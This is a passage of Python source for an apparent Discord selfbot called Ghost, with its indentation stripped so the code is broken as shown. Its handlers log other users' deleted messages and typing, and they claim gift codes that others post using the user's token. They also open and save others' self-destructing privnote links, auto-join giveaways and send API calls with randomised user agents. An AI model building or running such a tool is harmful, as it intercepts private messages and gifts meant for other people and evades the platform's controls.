# def print_info(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cYellow}[Information] {fg.cGrey} | {message}")
# def print_cmd(command):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.consoleColour}[Command] {fg.cGrey} | {Ghost.command_prefix}{command}")
# def print_sharecmd(author, command):
# print(f"{fg.cGrey}[{getCurrentTime()}] {fg.consoleColour}[SHARE COMMAND] {fg.cWhite}({author}) {command}")
# def print_error(error):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cRed}[Error] {fg.cGrey} | {error}")
# def print_detect(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cPink}[Detect] {fg.cGrey} | {message}")
# def print_sniper(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cOrange}[Sniper] {fg.cGrey} | {message}")
# def print_sniper_info(firstmessage, secondmessage):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cOrange}[Sniper] {fg.cGrey} | {firstmessage} | {secondmessage}")
if "beta" in version.lower():
print_important("You're currently using a beta build of Ghost.")
print_important("If you notice any bugs please report them to the developer.")
print(" ")
elif "dev" in version.lower():
print_important("You're currently using a developer build of Ghost.")
print_important("If you notice any bugs please report them to the developer.")
print(" ")
if not os.path.isfile('data/logins.txt'):
message = "1"
message_bytes = message.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_message = base64_bytes.decode('ascii')
f = open('data/logins.txt', "w")
f.write(base64_message)
f.close()
else:
f = open('data/logins.txt', "r")
loginsdata = f.read()
base64_message = loginsdata
base64_bytes = base64_message.encode('ascii')
message_bytes = base64.b64decode(base64_bytes)
message = message_bytes.decode('ascii')
logindata = int(message)+1
logindata_str = str(logindata)
logindata_bytes = logindata_str.encode('ascii')
base64_bytes = base64.b64encode(logindata_bytes)
base64_logindata = base64_bytes.decode('ascii')
f = open('data/logins.txt', "w")
f.write(f"{base64_logindata}")
f.close()
print_info(f"Ghost can now be used with {Ghost.command_prefix} prefix.")
send_notification("Ghost", "Successfully connected!", 10)
global __ghostloaded__
__ghostloaded__ = True
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/connected.mp3"))
pygame.mixer.music.play(1)
if json.load(open("richpresence.json"))["enabled"] == True:
def readyCallback(current_user):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cBlue}[RPC] {fg.cWhite}Discord rich presence has been enabled.")
def disconnectedCallback(codeno, codemsg):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cBlue}[RPC] {fg.cWhite}Discord rich presence has been disabled.")
def errorCallback(errno, errmsg):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cBlue}[RPC] {fg.cWhite}An error happend.")
callbacks = {'ready': readyCallback,'disconnected': disconnectedCallback,'error': errorCallback}
discord_rpc.initialize(str(json.load(open("richpresence.json"))["client_id"]), callbacks=callbacks, log=False)
for i in range(10):
discord_rpc.update_presence(**{
'details': json.load(open("richpresence.json"))["details"].replace("{version}", version),
'state': json.load(open("richpresence.json"))["state"].replace("{version}", version),
'start_timestamp': time.time(),
'large_image_key': json.load(open("richpresence.json"))["large_image_key"],
'large_image_text': json.load(open("richpresence.json"))["large_image_text"],
'small_image_key': json.load(open("richpresence.json"))["small_image_key"],
'small_image_text': json.load(open("richpresence.json"))["small_image_text"]
})
discord_rpc.update_connection()
await asyncio.sleep(2)
discord_rpc.run_callbacks()
async def get_message(ctx, id):
channelMsgHistory = await ctx.channel.history(limit=999999999).flatten()
for message in channelMsgHistory:
if message.id == id:
msg = message
return msg
@Ghost.event
async def on_error(event):
logging.error(str(event))
@Ghost.event
async def on_command(ctx):
try:
await ctx.message.delete()
except:
pass
print_cmd(f"{ctx.command.name}")
@Ghost.event
async def on_command_error(ctx, error):
logging.error(str(error))
if isinstance(error, commands.CommandNotFound):
try:
await ctx.message.delete()
except:
pass
else:
print_error(f"{error}")
try:
await ctx.message.delete()
except:
pass
@Ghost.event
async def on_message_delete(message):
if __ghostloaded__:
if Config.getConfig()["detections"]["deletedmessages"]:
if message.guild.id not in __ignoredservers__["deletedmessages"]:
print_detect("Deleted Message")
print_sniper_info("Content", message.content)
print_sniper_info("Author", str(message.author))
try:
print_sniper_info("Channel", str(message.channel))
except:
pass
try:
print_sniper_info("Guild", str(message.guild.name))
except:
pass
if Config.getConfig()["detections"]["ghostping"]:
if Ghost.user.mentioned_in(message):
if message.guild.id not in __ignoredservers__["ghostpings"]:
print_detect("Ghost Ping")
print_sniper_info("Content", str(message.content))
print_sniper_info("Author", str(message.author))
try:
print_sniper_info("Channel", str(message.channel))
except:
pass
try:
print_sniper_info("Guild", str(message.guild.name))
except:
pass
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Ghost Ping", f"You were ghost pinged in {message.guild} by {message.author}.", 10)
if __ghostpingwebhook__ != "":
webhook = DiscordWebhook(url=__ghostpingwebhook__)
embed = DiscordEmbed(title='Ghost Ping', color=__embedcolourraw__[1:], description=f"`{message.author}` ghost pinged you in `{message.channel}` (`{message.guild}`)")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
webhook.add_embed(embed)
response = webhook.execute()
@Ghost.event
async def on_member_ban(guild, user):
if __ghostloaded__:
if Config.getConfig()["detections"]["bans"]:
if guild.id not in __ignoredservers__["bans"]:
print_detect("Banned")
print_sniper_info("Member", f"{user}")
print_sniper_info("Member ID", f"{user.id}")
print_sniper_info("Guild", f"{guild.name}")
if str(Ghost.user) == str(user):
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Ban Detect", f"You were banned in {guild.name}.", 10)
@Ghost.event
async def on_guild_remove(guild):
if __ghostloaded__:
if Config.getConfig()["detections"]["guildleave"]:
if guild.id not in __guildleaveignoredservers__:
print_detect("Guild Left")
print_sniper_info("Name", guild.name)
print_sniper_info("ID", guild.id)
print_sniper_info("Owner", guild.owner)
if __guildleavewebhook__ != "":
webhook = DiscordWebhook(url=__guildleavewebhook__)
embed = DiscordEmbed(title='Guild Leave Detection', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='Name', value=str(guild.name), inline=False)
embed.add_embed_field(name='ID', value=str(guild.id), inline=False)
embed.add_embed_field(name='Owner', value=str(guild.owner), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
@Ghost.event
async def on_webhooks_update(channel):
if __ghostloaded__:
if Config.getConfig()["detections"]["webhookmodification"]:
if channel.guild.id not in __ignoredservers__["webhookmodifications"]:
print_detect("Webhook Modification")
try:
print_sniper_info("Server", channel.guild.name)
except:
pass
try:
print_sniper_info("Channel", channel.name)
except:
pass
@Ghost.event
async def on_relationship_add(relationship):
if __ghostloaded__:
if Config.getConfig()["detections"]["friendsupdate"]:
if isinstance(relationship.type, discord.RelationshipType.incoming_request):
print_detect("Incoming Friend Request")
print_sniper_info("User", relationship.user.name + "#" + relationship.user.discriminator)
print_sniper_info("ID", relationship.user.id)
if __friendsupdatewebhook__ != "":
webhook = DiscordWebhook(url=__friendsupdatewebhook__)
embed = DiscordEmbed(title='Incoming Friend Request', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=relationship.user.name + "#" + relationship.user.discriminator, inline=False)
embed.add_embed_field(name='ID', value=str(relationship.user.id), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
if isinstance(relationship.type, discord.RelationshipType.friend):
print_detect("New Friend")
print_sniper_info("User", relationship.user.name + "#" + relationship.user.discriminator)
print_sniper_info("ID", relationship.user.id)
if __friendsupdatewebhook__ != "":
webhook = DiscordWebhook(url=__friendsupdatewebhook__)
embed = DiscordEmbed(title='Incoming Friend Request', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=relationship.user.name + "#" + relationship.user.discriminator, inline=False)
embed.add_embed_field(name='ID', value=str(relationship.user.id), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
@Ghost.event
async def on_relationship_remove(relationship):
if __ghostloaded__:
if Config.getConfig()["detections"]["friendsupdate"]:
if isinstance(relationship.type, discord.RelationshipType.outgoing_request):
print_detect("Outgoing Friend Request")
print_sniper_info("User", relationship.user.name + "#" + relationship.user.discriminator)
print_sniper_info("ID", relationship.user.id)
if __friendsupdatewebhook__ != "":
webhook = DiscordWebhook(url=__friendsupdatewebhook__)
embed = DiscordEmbed(title='Outgoing Friend Request', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=relationship.user.name + "#" + relationship.user.discriminator, inline=False)
embed.add_embed_field(name='ID', value=str(relationship.user.id), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
if isinstance(relationship.type, discord.RelationshipType.blocked):
print_detect("Blocked User")
print_sniper_info("User", relationship.user.name + "#" + relationship.user.discriminator)
print_sniper_info("ID", relationship.user.id)
if __friendsupdatewebhook__ != "":
webhook = DiscordWebhook(url=__friendsupdatewebhook__)
embed = DiscordEmbed(title='Blocked User', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=relationship.user.name + "#" + relationship.user.discriminator, inline=False)
embed.add_embed_field(name='ID', value=str(relationship.user.id), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
if isinstance(relationship.type, discord.RelationshipType.friend):
print_detect("Removed Friend")
print_sniper_info("User", relationship.user.name + "#" + relationship.user.discriminator)
print_sniper_info("ID", relationship.user.id)
if __friendsupdatewebhook__ != "":
webhook = DiscordWebhook(url=__friendsupdatewebhook__)
embed = DiscordEmbed(title='Removed Friend', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=relationship.user.name + "#" + relationship.user.discriminator, inline=False)
embed.add_embed_field(name='ID', value=str(relationship.user.id), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
@Ghost.event
async def on_typing(channel, user, when):
global typinghistory
if __ghostloaded__:
if isinstance(channel, discord.DMChannel):
current_time = when
userid = int(user.id)
if userid not in typinghistory:
typinghistory[userid] = current_time
timedif = (current_time - typinghistory[userid]).total_seconds()
if timedif >= 120 or timedif == 0:
typinghistory[userid] = current_time
if Config.getConfig()["detections"]["dmtyping"]:
print_detect(f"DM Typing")
print_sniper_info("User", user)
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("DM Typing", f"{user} is typing in their DMs.", 10)
if __dmtypingwebhook__ != "":
webhook = DiscordWebhook(url=__dmtypingwebhook__)
embed = DiscordEmbed(title='DM Typing', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=str(user), inline=False)
embed.add_embed_field(name='ID', value=str(user.id), inline=False)
embed.add_embed_field(name='When', value=str(when), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
@Ghost.event
async def on_guild_channel_create(channel):
if __ghostloaded__:
if Config.getConfig()["snipers"]["tickets"]:
if "ticket" in channel.name:
if channel.guild.id not in __ignoredservers__["tickets"]:
if str(channel.type).lower() != "category":
request = requests.get(f"https://discord.com/api/channels/{channel.id}", headers={"Authorization": __token__, "User-Agent": get_random_user_agent()})
if request.status_code == 200:
print_sniper("Ticket")
try:
print_sniper_info("Server", channel.guild.name)
except:
pass
try:
print_sniper_info("Channel", channel.name)
except:
pass
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Ticket Sniper", f"{channel.name} was created in {channel.guild.name}.", 10)
if __ticketswebhook__ != "":
webhook = DiscordWebhook(url=__ticketswebhook__)
embed = DiscordEmbed(title='Ticket', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
try:
embed.add_embed_field(name='Server', value=str(channel.guild.name), inline=False)
except:
pass
try:
embed.add_embed_field(name='Channel', value=str(channel.name), inline=False)
except:
pass
webhook.add_embed(embed)
response = webhook.execute()
@Ghost.event
async def on_message(message):
if __ghostloaded__:
messageSendTime = datetime.now()
if message.author.id != Ghost.user.id:
if afkMode:
if isinstance(message.channel, discord.DMChannel):
await message.channel.send(CONFIG["afkmode"]["replymessage"])
if Config.getConfig()["snipers"]["nitro"]:
if "discord.gift/" in message.content:
if message.guild.id not in __ignoredservers__["nitro"]:
giftLink = ""
code = ""
for item in message.content.split(" "):
if "discord.gift/" in item:
giftLink = item
code = giftLink.replace("discord.gift/", "")
print_sniper("Nitro")
print_sniper_info("Link", giftLink)
print_sniper_info("Author", message.author)
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
nitroStatus = claim_nitro(code, __token__)
print_sniper_info("Status", nitroStatus)
print_sniper_info("Snipe Speed", str((datetime.now()-messageSendTime).total_seconds()) + "s")
if __nitrowebhook__ != "":
webhook = DiscordWebhook(url=__nitrowebhook__)
embed = DiscordEmbed(title='Nitro Sniper', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='Author', value=str(message.author), inline=False)
embed.add_embed_field(name='Gift Link', value=giftLink, inline=False)
embed.add_embed_field(name='Nitro Status', value=nitroStatus, inline=False)
embed.add_embed_field(name='Jump to message', value=f"[Click Here!]({message.jump_url})", inline=False)
webhook.add_embed(embed)
response = webhook.execute()
if nitroStatus == "Valid Code":
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Nitro Sniper", "Sniped a nitro gift code!", 10)
if Config.getConfig()["snipers"]["privnote"]:
if "privnote.com/" in message.content:
if message.guild.id not in __ignoredservers__["privnote"]:
privnoteLink = ""
fid = datetime.now().strftime("%m_%d_%Y-%H_%M_%S")
for item in message.content.split(" "):
if "privnote.com/" in item:
privnoteLink = item
print_sniper("Privnote")
print_sniper_info("Link", privnoteLink)
print_sniper_info("Author", message.author)
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
try:
content = read_privnote(privnoteLink)
file = open(f"privnote-saves/{fid}.txt", "w")
file.write(f"Privnote sent by {message.author} in #{message.channel.name}, {message.guild.name}.\nSniped at {fid}.\n \n{content}")
file.close()
print_sniper_info("Content", content)
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Privnote Sniper", "Sniped a privnote note!", 10)
except:
print_sniper_info("Failed", "Note already been read.")
print_sniper_info("Snipe Speed", str((datetime.now()-messageSendTime).total_seconds()) + "s")
if __privnotewebhook__ != "":
webhook = DiscordWebhook(url=__privnotewebhook__)
embed = DiscordEmbed(title='Privnote Sniper', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='Author', value=str(message.author), inline=False)
embed.add_embed_field(name='Privnote Link', value=privnoteLink, inline=False)
try:
embed.add_embed_field(name='Content', value=content, inline=False)
except:
embed.add_embed_field(name='Failed', value="Note already been read.", inline=False)
embed.add_embed_field(name='Jump to message', value=f"[Click Here!]({message.jump_url})", inline=False)
webhook.add_embed(embed)
response = webhook.execute()
if Config.getConfig()["snipers"]["giveaway"]:
if message.embeds:
messageEmbed = discord.Embed.to_dict(message.embeds[0])
if int(message.author.id) in giveawayBots and message.author.bot:
isGiveaway = False
if "giveaway" in message.content.lower() or "giveaway" in json.dumps(messageEmbed).lower():
isGiveaway = True
if isGiveaway:
if message.guild.id not in __ignoredservers__["giveaways"]:
embed = message.embeds[0].to_dict()
prize = embed["author"]["name"]
if "ban" in prize.lower() or "kick" in prize.lower() or "mute" in prize.lower() or "punish" in prize.lower():
print_sniper("Giveaway")
print_sniper_info("Prize", prize)
print_sniper_info("Skipped", "Sus prize.")
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Giveaway Sniper", f"Giveaway skipped because of sus prize.", 10)
else:
print_sniper("Giveaway")
print_sniper_info("Prize", prize)
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
if __giveawaywebhook__ != "":
webhook = DiscordWebhook(url=__giveawaywebhook__)
embed = DiscordEmbed(title='Giveaway Sniper', description=f"Sniped a giveaway for `{prize}` in `{message.guild.name}`.", color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
webhook.add_embed(embed)
response = webhook.execute()
# if __giveawaysniperui__ == True:
# def giveawayGUI():
# giveawayUi = tkinter.Tk()
# giveawayUi.attributes('-topmost', True)
# def addReactionForGiveaway():
# requests.put(f"https://discord.com/api/channels/{message.channel.id}/messages/{message.id}/reactions/%F0%9F%8E%89/@me", headers={"Authorization": __token__, "User-Agent": get_random_user_agent()})
# def closeGui():
# giveawayUi.destroy()
# def joinGiveaway():
# print(f"{printSpaces} {fg.cYellow}Joined giveaway!")
# addReactionForGiveaway()
# closeGui()
# giveawayUi.wm_title("Giveaway UI")
# windowWidth = giveawayUi.winfo_reqwidth()
# windowHeight = giveawayUi.winfo_reqheight()
# positionRight = int(giveawayUi.winfo_screenwidth()/2 - windowWidth/2)
# positionDown = int(giveawayUi.winfo_screenheight()/2 - windowHeight/2)
# giveawayUi.geometry("+{}+{}".format(positionRight, positionDown))
# tkinter.Label(giveawayUi, text=" ").pack()
# mainLabel = tkinter.Label(giveawayUi, text="Would you like to join a giveaway for").pack()
# prizeLabel = tkinter.Label(giveawayUi, text=prize).pack()
# tkinter.Label(giveawayUi, text=" ").pack()
# joinBtn = tkinter.Button(giveawayUi, text="Join", command=joinGiveaway, width=15, height=2, bg="green", fg="white").pack(side=tkinter.constants.LEFT)
# cancelBtn = tkinter.Button(giveawayUi, text="Cancel", command=closeGui, width=15, height=2, bg="red", fg="white").pack(side=tkinter.constants.LEFT)
# giveawayUi.mainloop()
# giveawayGUI()
# if Config.getConfig()["sounds"]:
# if str(sounddevice.query_devices()) != "":
# pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
# pygame.mixer.music.play(1)
# send_notification("Giveaway Sniper", f"Sniped a giveaway for {prize}.", 10)
# if __giveawaywebhook__ != "":
# webhook = DiscordWebhook(url=__giveawaywebhook__)
# embed = DiscordEmbed(title='Giveaway Sniper', description=f"Joined a giveaway for `{prize}` after pressing join in Giveaway UI.", color=__embedcolourraw__[1:])
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.set_timestamp()
# embed.add_embed_field(name='Prize', value=prize, inline=False)
# embed.add_embed_field(name='Joined After', value=f"Pressing join in Giveaway UI.", inline=False)
# embed.add_embed_field(name='Jump to message', value=f"[Click Here!]({message.jump_url})", inline=False)
# webhook.add_embed(embed)
# response = webhook.execute()
# else:
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Giveaway Sniper", f"Sniped a giveaway for {prize}.", 10)
await asyncio.sleep(__giveawayjoindelay__)
emoji = GIVEAWAYBOTS[str(message.author.id)]
await message.add_reaction(emoji)
if __giveawaywebhook__ != "":
webhook = DiscordWebhook(url=__giveawaywebhook__)
embed = DiscordEmbed(title='Giveaway Sniper', description=f"Joined a giveaway for `{prize}` after `{__giveawayjoindelay__}` seconds.", color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
webhook.add_embed(embed)
response = webhook.execute()
print_sniper("Giveaway")
print_sniper_info("Prize", prize)
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
print_sniper_info("Joined after", f"{__giveawayjoindelay__} seconds.")
send_notification("Giveaway Sniper", f"Joined a giveaway for {prize}.", 10)
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
# if "congratulations" in message.content.lower():
# if f"<@{Ghost.user.id}>" in message.content.lower():
# prize = message.content.split("!")[1].split("**")[1]
# print_sniper("Giveaway")
# print(f" {fg.cYellow}You won!!!")
# print_sniper_info("Prize", prize)
# try:
# print_sniper_info("Server", message.guild.name)
# except:
# pass
# try:
# print_sniper_info("Channel", message.channel.name)
# except:
# pass
# if __giveawaywebhook__ != "":
# webhook = DiscordWebhook(url=__giveawaywebhook__)
# embed = DiscordEmbed(title='Giveaway Sniper', description=f"You won a giveaway for `{prize}`!", color=__embedcolourraw__[1:])
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.set_timestamp()
# webhook.add_embed(embed)
# response = webhook.execute()
# send_notification("Giveaway Sniper", f"You won a giveaway for {prize} 🎉!", 10)
# if Config.getConfig()["sounds"]:
# if str(sounddevice.query_devices()) != "":
# pygame.mixer.music.load(resource_path("sounds/giveaway-win.mp3"))
# pygame.mixer.music.play(1)
if Config.getConfig()["detections"]["selfbot"]:
if not message.author.bot:
if message.embeds:
if "http" not in message.content:
if message.guild.id not in __ignoredservers__["selfbots"]:
print_detect("Selfbot")
print_sniper_info("Author", message.author)
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
print_sniper_info("Reason", "Sent an embedded message.")
if __selfbotwebhook__ != "":
webhook = DiscordWebhook(url=__selfbotwebhook__)
embed = DiscordEmbed(title='Selfbot', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='Author', value=str(message.author), inline=False)
try:
embed.add_embed_field(name='Server', value=str(message.guild.name), inline=False)
except:
pass
try:
embed.add_embed_field(name='Channel', value=str(message.channel.name), inline=False)
except:
pass
embed.add_embed_field(name='Reason', value="Sent an embedded message.", inline=False)
webhook.add_embed(embed)
response = webhook.execute()
if message.author.id == Ghost.user.id:
ccmd = json.load(open("customcommands.json"))
for key in ccmd:
cmd = key
response = ccmd[key]
if message.content == f"{__prefix__}{cmd}":
print_cmd(f"{cmd}")
try:
await message.delete()
except:
pass
response = response.replace("{currenttime}", str(datetime.now().strftime("%H:%M:%S")))
response = response.replace("{currentdate}", str(datetime.now().strftime("%d/%m/%Y")))
response = response.replace("{version}", str(version))
response = response.replace("{prefix}", str(__prefix__))
response = response.replace("{theme}", str(__theme__))
response = response.replace("{randomint}", str(random.randint(1000, 9999)))
response = response.replace("{randomstring}", str(''.join(random.choice(string.ascii_letters) for i in range(8))))
await message.channel.send(response)
if (uwuifyEnabled):
if (not message.content.startswith(__prefix__) or message.content == "" or message.content == None):
uwuedMessage = uwuify.uwu(message.content)
await message.edit(content=uwuedMessage)
#print(str(message.author) + " : " + str(message.content))
await Ghost.process_commands(message)
for filename in os.listdir('scripts/'):
if filename.endswith('.py'):
include(f'scripts/{filename}')
@Ghost.command(name="yes", description="yes", usage="yes", aliases=["ja", "po", "አዎ", "نعم", "այո", "bəli", "bai", "так", "হ্যাঁ", "da", "да", "sí", "oo", "inde", "是的", "Iè", "Ano", "jes", "jah", "Joo", "Oui", "si", "დიახ", "Ναί", "હા", "wi", "iya", "ae", "כן", "हां", "yog", "Igen", "Já", "Ya", "tá", "sì", "はい", "ya wis", "ಹೌದು", "иә", "បាទ", "yego", "네", "Erê", "Ооба", "ແມ່ນແລ້ວ", "sic", "Jā", "taip", "jo", "ENY", "ya", "അതെ", "iva", "āe", "होय", "тиймээ", "ဟုတ်တယ်", "हो", "ହଁ", "هو", "آره", "tak", "sim", "ਹਾਂ", "ioe", "tha", "ho joalo", "Ehe", "ها", "ඔව්", "Áno", "haa", "enya", "ndio", "бале", "ஆம்", "әйе", "అవును", "ใช่", "Evet", "hawa", "جی ہاں", "ھەئە", "ha", "Đúng", "oes", "Ewe", "יאָ", "beeni", "yebo", ])
async def yes(ctx):
await ctx.send("<https://www.youtube.com/watch?v=BBJa32lCaaY>")
@Ghost.command(name="scripts", description="Display all custom scripts.", usage="scripts", aliases=["customscripts", "userscripts"])
async def scripts(ctx):
totalscripts = len(os.listdir('scripts/'))
text = ""
for script in os.listdir('scripts/'):
if script.endswith('.py'):
script = script.replace(".py", "")
text += f"{script}\n"
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", description=f"Found {totalscripts} custom scripts", color=__embedcolour__)
embed.add_field(name="Scripts", value=text)
embed.set_author(name="Custom Scripts")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Custom Scripts ]
Found {totalscripts} custom scripts
{text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="customcommands", description="Display all custom commands.", usage="customcommands", aliases=["ccmds", "usercommands", "ucmds"])
async def customcommands(ctx):
totalcmds = len(ccmd)
ccmd2 = ""
for key in ccmd:
cmd = key
ccmd2 = ccmd2 + f"{__prefix__}{cmd}\n"
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"Found {totalcmds} custom commands.")
embed.add_field(name="Commands", value=ccmd2)
embed.set_author(name="Custom Commands")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Custom Commands ]
Found {totalcmds} custom commands.
{ccmd2}
{__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="allcmds", description="Print a list of all the commands.", usage="allcmds", aliases=["features"])
async def allcmds(ctx):
await ctx.message.delete()
content = ""
totalCommands = len(Ghost.commands)
for command in Ghost.commands:
content += f"{command.usage} : {command.description}\n"
file = open("data/features.txt", "w")
file.write(f"[All Commands]\nTotal Commands: {totalCommands}\n \n" + content)
file.close()
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", description=f"These are all the commands", color=__embedcolour__)
embed.add_field(name="Commands", value="https://github.com/GhostSelfbot/Ghost/blob/dev/features.txt")
embed.set_author(name="All Ghost Commands")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("https://github.com/GhostSelfbot/Ghost/blob/dev/features.txt")
@Ghost.command(name="search", description="Search for commands.", usage="search [term]", aliases=["find", "searchcommand"])
async def search(ctx, *, command = None):
if command is None:
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description="Please enter a command to search for.")
embed.set_author(name="Search")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_image(url=__embedlargeimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Search ]
Please enter a command to search for.
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
else:
text = ""
text2 = ""
searchedItems = 0
for cmd in Ghost.commands:
if command in cmd.name or command in cmd.description or command in cmd.aliases:
searchedItems += 1
text += f"`{Ghost.command_prefix}`**{cmd.usage}** » {cmd.description}\n"
text2 += f"{Ghost.command_prefix}{cmd.usage} » {cmd.description}\n"
try:
if __embedmode__:
embed = discord.Embed(title=f"Search results...", description=f"Found `{searchedItems}` items for `{command}`.\n\n{text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_image(url=__embedlargeimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Searched for {command} ]
{text2}
